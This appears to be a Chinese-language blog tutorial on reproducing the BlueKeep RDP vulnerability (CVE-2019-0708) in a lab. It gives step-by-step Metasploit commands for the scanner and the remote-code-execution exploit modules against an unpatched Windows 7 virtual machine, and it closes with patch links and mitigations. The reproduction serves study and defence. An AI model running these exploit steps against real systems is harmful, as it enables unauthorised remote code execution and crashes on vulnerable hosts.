最详细利用kali的msf进行CVE-2019-0708漏洞复现

CVE-2019-0708

技术无罪,请勿用于恶意用途,出事本人不负一切责任

0.漏洞背景

Windows再次被曝出一个破坏力巨大的高危远程漏洞CVE-2019-0708。攻击者一旦成功利用该漏洞,便可以在目标系统上执行任意代码,包括获取敏感信息、执行远程代码、发起拒绝服务攻击等等攻击行为。而更加严重的是,这个漏洞的触发无需用户交互,攻击者可以用该漏洞制作堪比2017年席卷全球的WannaCry类蠕虫病毒,从而进行大规模传播和破坏。

1.影响范围

Windows 7
Windows Server 2008 R2
Windows Server 2008
Windows 2003
Windows XP

2.复现操作

2.0 提前准备好一个没有打补丁的win7系统(虚拟机和物理机都可以,推荐虚拟机,不要使用自己拿下的服务器,蓝屏后果无法预测)
2.1 打开kali更新msf框架
apt-get update
apt-get upgrade metaspolit-framework

最详细利用kali的msf进行CVE-2019-0708漏洞复现_第1张图片
下载可能会慢点,耐心等待即可

2.2 打开msf,并搜索0708
msfconsole
search 0708
usre

最详细利用kali的msf进行CVE-2019-0708漏洞复现_第2张图片

2.3 使用扫描模块(scanner)
use  auxiliary/scanner/rdp/cve_2019_0708_bluekeep
show options
set rhost 192.168.237.131 //这里的ip填写自己win7主机的ip
run

最详细利用kali的msf进行CVE-2019-0708漏洞复现_第3张图片
最详细利用kali的msf进行CVE-2019-0708漏洞复现_第4张图片
如果发现箭头指向的这段话证明目标主机存在0708漏洞,可以利用

2.4 进行利用
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce 
show targets //选择目标主机类型  这里我选择了7601 -vmware 15
set target 4
set rhost 192.168.237.131
run

最详细利用kali的msf进行CVE-2019-0708漏洞复现_第5张图片

最详细利用kali的msf进行CVE-2019-0708漏洞复现_第6张图片
如果出现上述错误 再run几次

最详细利用kali的msf进行CVE-2019-0708漏洞复现_第7张图片
如果出现这个,证明已经成功了
直接敲命令就行了,复现成功
最详细利用kali的msf进行CVE-2019-0708漏洞复现_第8张图片

可能会出现蓝屏,听说msf的利用已经停稳了,我是没有蓝屏。。

3.防御措施

3.0 及时安装微软发布的安全更新补丁:

Microsoft官方已经在2019年5月14日修复了该漏洞,用户可以通过安装微软的安全更新来给系统打上安全补丁,下载地址为:

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708

以及为已不受微软更新支持的系统Windows Server 2003和Windows XP提供的安全更新,下载地址:

https://support.microsoft.com/zh-cn/help/4500705/customer-guidance-for-cve-2019-0708

3.1缓解措施(在无法及时安装微软安全更新的情况下作为临时性解决方案):

若用户不需要用到远程桌面服务,建议禁用该服务。

开启网络级别身份验证(NLA),此方案适用于Windows 7, Windows Server 2008, Windows Server 2008 R2。

以上缓解措施只能暂时性针对该漏洞对系统进行部分缓解,强烈建议在条件允许的情况下及时安装微软安全更新。

你可能感兴趣的:(kali,漏洞复现)